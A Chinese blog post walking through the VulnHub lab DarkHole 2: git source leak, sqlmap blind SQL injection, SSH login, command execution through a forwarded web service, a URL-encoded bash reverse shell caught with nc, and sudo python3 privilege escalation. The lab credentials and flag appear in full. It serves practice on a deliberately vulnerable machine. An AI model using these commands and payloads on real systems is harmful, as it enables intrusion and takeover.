vulnhub靶场————darkhole 2

于 2024-08-17 16:33:07 发布
阅读量571 收藏 10
点赞数 18
文章标签: python linux web安全 网络安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65809311/article/details/141279741
版权

总体目标:

  • 一月掌握渗透思路

本期内容:

靶场地址:https://www.vulnhub.com/entry/darkhole-2,740/

靶场截图:

  1. nmap、dirb等信息收集
  2. git源码泄露,发现账户密码
  3. sql注入发现ssh账户密码
  4. 查看用户历史命令记录,发现远程服务器提供的web服务(功能:远程命令执行)
  5. 执行历史命令,上传payload,获得losy的shell
  6. 查看用户历史命令记录,发现用户密码
  7. 建立ssh连接,python 执行提权代码

打靶时间:

  • 2024.8.17

打靶记录:

信息收集

  1.  nmap扫描        nmap -sP 192.168.178.0/24        由于默认 目标机 和 本机 在同一网段,我使用子网掩码24位(255.255.255.0)        从结果发现目标机IP 192.168.178.161

  2. nmap进行端口、漏洞扫描 nmap -sS -script=vuln 192.168.178.161    目标机开放80 22端口,对应web服务和ssh服务。  同时,我发现了目标机发生了 git泄露。 

漏洞利用--git泄露

  1. wget 下载源码   
    wget -r http://192.168.178.161/.git

    结果以 192.168.178.161的文件夹形式 存在

  2. git log 查看修改记录  如下图:发现a4d9 向login.php添加了默认凭证

  3. 切换到a4d9分支处   

    git checkout a4d9

    遇到的错误表明你在切换到其他分支或提交时,本地工作区有未提交的更改,而这些更改会被新分支上的内容覆盖。Git 为了保护你的更改,阻止了这个操作。

  4. 解决办法:由于我没有进行修改本工作区,不进行提交修改保存,而是暂存起来。

    git stash
git checkout a4d9

    第一条命令执行后,我发现 目录 新增了网站源码dashboard.php,如下图所示:这个我也没明白

  5. 命令执行完后,如下图:

  6. cat login.php 查看代码,如下图:我发现了默认凭证 lush@admin.com  321

  7. 尝试登陆一下,访问http://192.168.178.161:80

  8. 发现url地址栏中 有参数 id , 也许我可以利用sql注入漏洞

漏洞利用--sql注入

  1. sqlmap进行自动注入,发现 id 造成了 基于延时注入sleep的盲注入漏洞。 
    sqlmap -u http://192.168.178.161/dashboard.php?id=3 --cookie PHPSESSID=ohtm5bgels9sk1kqq5739resm5 -a

    发现了ssh表:用户名 jehad 密码 fool

权限提取

  1. 利用ssh服务,登陆johad账户 
    ssh jehad@192.168.178.161

    以下是:sudo -i   提权;python提权 都失败了,我们需要寻找其他用户。

  2. 进行目录文件查看,发现敏感信息。

    /home/kali/jehad
    ls -la

    发现 .bash_history      .bash_history 文件是 Bash shell 用来存储历史命令的文件。每当你在 Bash shell 中执行一个命令时,这个命令会被记录到 .bash_history 文件中。

  3. 查看.bash_history内容:

     ssh -L 127.0.0.1:9999:192.168.135.129:9999 jehad@192.168.135.129
     curl http://localhost:9999
     curl "http://localhost:999/?cmd=id" 
     curl "http://localhost:9999/?cmd=id" 
    这些命令使用了 ssh 的端口转发功能。这是一种在 SSH 连接上通过指定的端口将流量从本地计算机转发到远程计算机的方式。你可以通过本地计算机的 127.0.0.1:9999 端口来测试或访问远程计算机上的服务,仿佛它们是在本地计算机上运行一样。
    连接建立后,传递了cmd=id,很明显是通过web服务来执行远程命令。
    我重复它的操作,来获得系统命令执行功能,为后续提权做准备。

  4. 模拟历史行为,建立具有端口转发功能的ssh连接。并通过web服务中的cmd参数执行提权命令。

    ssh -L 9999:127.0.0.1:9999 jehad@192.168.178.161
    curl "http://127.0.0.1:9999/?cmd=id"
curl "http://127.0.0.1:9999/?cmd=whoami"
curl "http://127.0.0.1:9999/?cmd=ifconfig"

    以上三条命令正确执行,发现 远程执行使用的是 losy 用户,那我可以通过构造cmd参数的值,让losy用户反弹一个shell,我在特定端口监听,从而获得losy的shell,紧接着进行下一步提权。

  5. http://127.0.0.1:9999/?cmd=payload        payload为url编码,完成向本机特定端口反弹shell,其中 192.168.178.160/6666 是我的ip和port

    bash -c 'bash -i >& /dev/tcp/192.168.178.160/6666 0>&1'
payload:bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.178.160%2F6666%20%300%3E%261%27

    如下图:执行

  6. nc 在6666端口上监听,得到shell后,寻找losy密码,用于提权。

    nc -nlvp 6666

    寻找losy密码等敏感信息

    /home/losy 路径下 输入 ls -la 发现.bash_history  查看内容发现密码gang
  7. 建立losy的ssh连接
  8. 在losy上进行提权,sudo -i 就不试了,一般不行。我发现了python3可以使用,我们使用pyhon代码来提权:sudo python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
  9. 进入到root下,在/home的root.txt发现flag:Legend

总结:

·nmap 、git(git log  git checkout ) 、 linux提权命令 、 python提权命令

·.bash_history文件

这次靶场主要是学习了文件,命令等基础知识。思路还是很简单的。

mua1
关注
  • 18
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
Vulnhub靶场题解.html
08-12
Vulnhub靶场题解.,适合渗透测试人员学习交流
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
Python】入门到放弃之第九章《字典》
MP13537560060的博客
08-15 623
这是本系列的第九章节内容,《字典》。在Python中,字典(Dictionary)是一种内置的数据结构,用于存储键值对(key-value pairs)。字典是可变的,意味着你可以在创建字典后添加、删除或修改其中的元素。字典的键(key)必须是唯一的,并且是不可变的(即,它们必须是不可变数据类型,如字符串、数字或元组,但不能是列表或字典等可变类型)。字典的值(value)则可以是任何数据类型,包括列表、元组、字典等。以上,就是Python中字典的全部内容。
python学习】深入解析 `jq` 库:JSON 处理的利器
m0_54007171的博客
08-13 396
jq库是 Python 对流行的命令行工具jq的封装。它允许你直接在 Python 中使用jq的查询语言来处理 JSON 数据。借助jq,你可以轻松地对 JSON 数据进行过滤、选择、转换、聚合等操作,极大地简化了代码复杂度。
GraphRAG:复杂查询的知识图谱新框架
YeJuliaLi的博客
08-14 778
微软最近发布了名为 GraphRAG(Graphs + Retrieval Augmented Generation)的创新 RAG 框架,这是一个将文本提取、语义网络分析,与大语言模型(LLM)的提示和总结功能结合在一起的端到端系统,用于深入理解文本数据集。在对私有数据中的复杂文本信息进行文档分析时,GrahRAG 使用 LLM 生成的知识图谱来大幅提高问答性能。这里的私有数据集是指 LLM 没...
python 实现tree sort树排序算法
luthane的博客
08-14 488
树排序”(Tree Sort)并不是一个广泛认知或标准算法库中的直接术语,但我们可以从字面意思上理解它可能指的是一种基于树结构的排序算法。在算法和数据结构领域,有多种使用树来辅助排序的算法,但没有一个特定的、广泛接受的“树排序”算法。
【Markdown】Markdown 中的语言简称
EleganceJiaBao的博客
08-12 961
以下是常见编程语言、脚本语言、标记语言等在 Markdown 中的语言简称以及相应的示例:
Java读写EM4305卡、将4305卡制做成4100ID卡
zhangjin7422的专栏
08-14 376
Java读写em4305低频RFID源码,支持将EM4305卡配置成4100ID卡
importlib库介绍
m0_51579041的博客
08-14 200
importlib
python爬虫入门(六)之 xpath 解析
2302_79795489的博客
08-16 412
XPath(XML Path Language)是一种用于在 XML 文档中查找信息的语言。html是xml的一个子集(XML 允许用户创建自己的标签来描述数据。例如,<book><title><author>是 XML 标签,可以用于描述书籍信息)。Xpath可以用来遍历 XML 文档的节点、选择节点,或对节点进行条件筛选,实际上它就是靠节点之间的关系去查找内容。
Pythonpython中抽象类学习笔记
qq_42761751的博客
08-12 419
抽象类是一个不能被实例化的类,通常作为其他类的基类抽象方法是一个没有具体实现的方法一个抽象类可以有或者没有抽象方法, 但是一般来说定义抽象类的时候总会在类中定义抽象方法Python并没有直接支持抽象类,但是提供了一个模块(abc)来允许定义抽象类通过继承abc.ABC类定义一个抽象类pass上述代码中类虽然继承了ABC但是没有定义抽象方法,仍然可以被实例化。"""使用@abstractmethod来定义抽象方法"""passmain()代码报错:不能实例化一个带有抽象方法的抽象类。
SciPy:基于 NumPy 的算法库和数学工具包,用于数学、科学和工程领域。
LS_Ai的博客
08-15 757
无论是进行线性代数运算、优化问题求解、积分与微分方程处理,还是进行信号和图像处理,SciPy都提供了高度优化的工具,使得复杂的科学计算任务变得更加简单和高效。SciPy的目标是为用户提供一个全面的科学计算环境,其中涵盖了常见的线性代数、优化、积分、插值、傅里叶变换、信号处理、统计、图像处理、以及ODE(常微分方程)求解等功能。SciPy与NumPy紧密结合,同时也与Pandas、Matplotlib等库有很好的兼容性,这使得它在科学研究、数据分析和工程计算中占据了重要地位。
Python快速入门和实践019】Python常用脚本-查看视频信息并压缩视频
最新发布
2403_83044722的博客
08-16 214
这段代码用于查看视频帧率,帧数以及大小,并且是否需要按照设定参数压缩原始视频。
Android声音播放与录制
轻口味的专栏
08-16 489
例如你在听music的时候接到电话,这个时候music播放肯定会停止,此时你只能听到电话,如果你调节音量的话,这个调节肯定只对电话起作用。当电话打完了,再回到music,你肯定不用再调节音量了。而STATIC的意思是一开始创建的时候,就把音频数据放到一个固定的buffer,然后直接传给audiotrack,后续就不用一次次得write了。其实系统将这几种声音的数据分开管理,所以,这个参数对AudioTrack来说,它的含义就是告诉系统,我现在想使用的是哪种类型的声音,这样系统就可以对应管理他们了。
利用python写一个可视化的界面
huanghm88的专栏
08-08 3941
这段代码创建了一个窗口,并在窗口中添加了一个标签和一个按钮。当按钮被点击时,标签的文本会变成"Hello, World!你可以根据自己的需求修改窗口的布局和添加其他控件。要利用Python编写一个可视化界面,你可以使用一些图形库来实现,例如Tkinter、PyQt、wxPython等。
练习题:猜数字游戏、求1-100 的和 简单复习一下!
weixin_47515798的博客
08-16 108
通过while循环计算从1累加到100的和。2.有3次猜测机会,通过3层嵌套判断实现。1.数字自己产生,范围1-10。
vulnhub靶场 planets
08-28
vulnhub靶场"planets"是一个信息搜集与利用的主机发现的靶场。你可以在找到更多关于该靶场的详细信息。 根据辐射测年估计和其他证据,地球形成于45亿年前。在地球历史的最初10亿年里,生命出现在海洋中,并开始影响地球的大气层和表面,导致厌氧生物和后来的需氧生物的扩散。一些地质证据表明,生命可能早在41亿年前就出现了。 如果你想登录vulnhub靶场"planets"的管理员界面,你可以使用用户名"terra"和密码"earthclimatechangebad4humans"登录https://earth.local/admin。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [vulnhub靶场——THE PLANETS:EARTH](https://blog.csdn.net/Czheisenberg/article/details/122900121)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH](https://blog.csdn.net/qq_57976347/article/details/122695436)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值